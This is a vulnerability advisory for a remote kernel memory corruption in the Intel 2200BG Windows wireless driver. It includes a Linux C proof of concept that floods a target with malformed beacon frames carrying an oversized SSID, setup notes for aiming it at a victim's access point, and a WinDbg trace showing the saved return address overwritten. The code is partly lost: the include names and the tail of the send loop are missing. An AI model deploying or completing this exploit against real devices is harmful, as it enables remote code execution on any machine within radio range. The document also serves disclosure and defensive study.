Title: Intel 2200BG 802.11 Beacon Frame Kernel Memory Corruption

Description: The Intel wireless mini-PCI driver shipped with Intel 2200BG cards is vulnerable to a remote, race-condition memory-corruption flaw. Malformed beacon frames can be used to corrupt internal kernel structures, leading to arbitrary code execution. The vulnerability is triggered by flooding the wifi card with many malformed beacon frames; because the flaw is described as a race, a single frame is not expected to be sufficient, which is why the PoC sends in a tight loop. Frame data is copied over internal kernel structures, so subsequent memory operations are performed on attacker-controlled values, including the saved return address (EIP) — see the WinDbg trace at the end of this advisory. The vulnerability was found in Intel 2200 driver version 9.0.3.9 (09/12/2005); this advisory names no fixed version. Driver files (with file hashes): w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725, w29mlres.dll 35afeccc4092b69f62d757c4707c74e9, w29NCPA.dll 980f58b157baedc23026dd9302406bdd.

Author: Breno Silva Pinto (Open Communications Security / bsilva[at]sekure[dot]org) - initial discovery and PoC. Johnny Cache - help producing a working exploit.

Proof Of Concept. Practitioner notes: this is a Linux raw-injection sender — it binds an AF_PACKET/SOCK_RAW socket to the interface hard-coded as "ath0raw", so adapt that name to your own monitor/injection interface, and set the BSSID and source MAC in the beacon to the AP the victim is associated with, as the in-code comment says. The header names of the 14 #include lines were lost in extraction, as was the tail of the send loop in main(). The PoC also zeroes only the first sizeof(beacon) bytes of the 700+sizeof(beacon)-byte s_1 buffer, so any bytes it transmits beyond that are uninitialised stack contents, which makes runs non-deterministic. The frame is an otherwise well-formed beacon whose SSID element (tag at offset 36) is overwritten from its length byte at offset 37 onward with an inflated length (0x44 = 68, beyond the 32-byte SSID maximum) and filler bytes before being flooded at the target.
#include #include #include #include #include #include #include #include #include #include #include #include #include #include // Change BSSID and SRC MAC ADDR to AP you are associated char beacon[] = { 0x80, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,0x00, 0x18, 0x39, 0xe2, 0x12, 0xda, 0x30, 0x2f, 0x84, 0x18, 0xa9, 0xf7, 0x00, 0x00, 0x00, 0x00, 0x64, 0x00, 0x01, 0x04, 0x00, 0xff, 0x53, 0x41, 0x55, 0x4e, 0x41, 0x01, 0x08, 0x82, 0x84, 0x8b,0x96, 0x24, 0x30, 0x48, 0x6c, 0x04, 0x01, 0x08, 0x05, 0x04, 0x00, 0x01, 0x00, 0x00, 0x2a, 0x01,0x04, 0x2f, 0x01, 0x04, 0x32, 0x04, 0x0c, 0x12, 0x18, 0x60, 0xdd, 0x06, 0x00, 0x10, 0x18, 0x02,0x00, 0xf4, 0x08, 0xc1, 0xca, 0x93 }; int main() { struct sockaddr_ll link; struct ifreq iface; int s, i, randd = 0x22, j, m, a, b; unsigned long len = 0, c = 0; char s_1[700+sizeof(beacon)]; if((s=socket(PF_INET, SOCK_DGRAM, 0))<0) return 0; bzero(&iface,sizeof(iface)); bzero(&link,sizeof(link)); bzero(s_1,sizeof(beacon)); 
strcpy(iface.ifr_name,"ath0raw"); if(ioctl(s,SIOCGIFHWADDR, &iface)) { return 0; } if(ioctl(s,SIOCGIFINDEX, &iface)) { return -1; } if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) { return -1; } link.sll_family = AF_PACKET; link.sll_ifindex = iface.ifr_ifindex; if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) { return -1; } memcpy(s_1,beacon,sizeof(beacon)); randd = 0x44; for(i=0;i<33;i++) s_1[37+i] = 0x44; for(;;) { i = 147; for(j=0;j
[... the remainder of the send loop and the end of main() were lost in extraction ...]

WinDbg kernel trace of the crash:
kd> kv
ChildEBP RetAddr Args to Child
f7a92e68 f6806422 badb0d00 ffffffd2 00000000 nt!KiTrap0E+0x233 (FPO: [0,0] TrapFrame @ f7a92e68)
WARNING: Stack unwind information not available. Following frames may be wrong.
f7a92f24 5b5a5958 00000378 ffffffd2 015dcf64 w29n51+0x4e422
f7a92f4c f67f56b5 8659feb0 01010077 00000000 0x5b5a5958
f7a92f64 f67f2f09 8659f000 f7a92f94 f67de759 w29n51+0x3d6b5
f7a92f70 f67de759 8659f000 4001000d 4001000d w29n51+0x3af09
f7a92f94 f67cf873 86dc8568 86dc6888 00000000 w29n51+0x26759
f7a92fa8 f67b938c 86dc6888 86bd1000 f7a92fd0 w29n51+0x17873
f7a92fb8 f74aaf09 86bd1000 448a47c0 00000001 w29n51+0x138c
f7a92fd0 804dbbd4 86dc8580 86dc856c 00000000 NDIS!ndisMDpcX+0x21 (FPO: [Non-Fpo])
f7a92ff4 804db89e f1751d54 00000000 00000000 nt!KiRetireDpcList+0x46 (FPO: [0,0,0])
f7a92ff8 f1751d54 00000000 00000000 00000000 nt!KiDispatchInterrupt+0x2a (FPO: [Uses EBP] [0,0,1])
804db89e 00000000 00000009 bb835675 00000128 0xf1751d54

The return address was overwritten with 0x5b5a5958: the w29n51+0x4e422 frame returns into 0x5b5a5958, an apparently unmapped address, hence the page-fault trap (nt!KiTrap0E) at the top of the stack. The bytes 58 59 5a 5b are consistent with a counting fill pattern taken from the attacker-controlled frame contents, which is what turns this from a crash into control of EIP. Note that the crash is on the receive path in DPC context (NDIS!ndisMDpcX -> w29n51); beacons are neither authenticated nor require association, so the trigger is reachable by any transmitter in radio range.